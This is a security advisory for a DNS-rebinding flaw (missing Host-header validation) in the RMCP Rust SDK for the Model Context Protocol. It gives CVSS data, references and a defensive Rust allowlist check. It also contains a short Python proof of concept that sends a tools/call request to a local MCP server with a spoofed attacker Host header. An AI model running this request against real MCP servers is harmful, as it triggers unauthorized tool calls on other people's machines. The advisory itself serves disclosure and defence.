Security Vulnerability Report
CVE-2026-42559 CVSS 8.8 HIGH

Published: 2026-05-14 15:16:47
Last Modified: 2026-05-14 17:19:50

Description

RMCP is an official Rust SDK for the Model Context Protocol. Prior to version 1.4.0, the rmcp crate's Streamable HTTP server transport (crates/rmcp/src/transport/streamable_http_server/) did not validate the incoming Host header. This allowed a malicious public website, via a DNS rebinding attack, to send authenticated requests to an MCP server running on the victim's loopback or private-network interface. This vulnerability is fixed in 1.4.0.
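A Host-header allowlist check of the kind the description calls for, as an added example (not the rmcp crate's own code; the function names, the `LOOPBACK_HOSTS` list and the expected-port parameter are assumptions). A browser reaching a loopback server through a rebound attacker domain still sends that domain in Host, so the request is refused even though the TCP connection arrived on 127.0.0.1.

```rust
// Added example, not rmcp's code: reject requests whose Host header does not
// name the server itself, which is what closes the DNS-rebinding hole.

/// Split an HTTP Host header value into (host, optional port).
/// Handles bracketed IPv6 literals such as "[::1]:8080".
fn split_host_port(value: &str) -> Option<(&str, Option<u16>)> {
    let v = value.trim();
    if v.is_empty() {
        return None;
    }
    if let Some(rest) = v.strip_prefix('[') {
        let end = rest.find(']')?;
        let host = &rest[..end];
        let after = &rest[end + 1..];
        return match after.strip_prefix(':') {
            None if after.is_empty() => Some((host, None)),
            Some(p) => Some((host, Some(p.parse().ok()?))),
            _ => None, // trailing junk after the bracket
        };
    }
    match v.rsplit_once(':') {
        Some((h, p)) if !h.contains(':') => Some((h, Some(p.parse().ok()?))),
        Some(_) => None, // unbracketed IPv6 is not a valid Host value
        None => Some((v, None)),
    }
}

/// Allowed host names / IP literals for a server bound to loopback (assumed list).
pub const LOOPBACK_HOSTS: &[&str] = &["localhost", "127.0.0.1", "::1"];

/// Returns true only when the Host header names an allowed host and, when an
/// expected port is configured, carries that port. Comparison is ASCII
/// case-insensitive, as DNS names are.
pub fn host_header_allowed(host_header: &str, allowed: &[&str], expected_port: Option<u16>) -> bool {
    let Some((host, port)) = split_host_port(host_header) else {
        return false;
    };
    if let (Some(exp), Some(got)) = (expected_port, port) {
        if exp != got {
            return false;
        }
    }
    allowed.iter().any(|a| a.eq_ignore_ascii_case(host))
}

fn main() {
    // Constructed sample Host values, including the rebound attacker domain.
    for h in ["localhost:8080", "127.0.0.1", "[::1]:8080", "attacker.example:8080"] {
        println!("{h:<24} -> {}", host_header_allowed(h, LOOPBACK_HOSTS, Some(8080)));
    }
}
```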

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RMCP < 1.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC demonstrating the impact of missing Host header validation
# Attacker side script to simulate the request sent after DNS rebinding
import requests


def exploit_local_mcp(target_ip, target_port, malicious_host):
    """
    Simulates a request sent by a browser to a local service after DNS rebinding.
    The Host header is set to the attacker's domain to bypass potential checks
    that might rely on it, though in this specific vuln, the check is MISSING.
    """
    url = f"http://{target_ip}:{target_port}/api/endpoint"
    headers = {
        "Host": malicious_host,  # The server fails to validate this
        "User-Agent": "Mozilla/5.0 (Attacker Browser)",
        "Content-Type": "application/json",
    }
    # Malicious payload to be executed on the local server
    payload = {
        "jsonrpc": "2.0",
        "method": "tools/call",
        "params": {"name": "malicious_tool", "arguments": {}},
        "id": 1,
    }
    try:
        response = requests.post(url, json=payload, headers=headers, timeout=5)
        print(f"[+] Request sent to {url} with Host: {malicious_host}")
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body: {response.text}")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")


# Usage Example
# exploit_local_mcp("127.0.0.1", 8080, "attacker.com")
```

References

https://github.com/modelcontextprotocol/rust-sdk/commit/8e22aa2de28df5a285eed87c11cd89bf15fa90d3
https://github.com/modelcontextprotocol/rust-sdk/issues/815
https://github.com/modelcontextprotocol/rust-sdk/issues/822
https://github.com/modelcontextprotocol/rust-sdk/pull/764
https://github.com/modelcontextprotocol/rust-sdk/security/advisories/GHSA-89vp-x53w-74fx

Weaknesses

CWE-346, CWE-350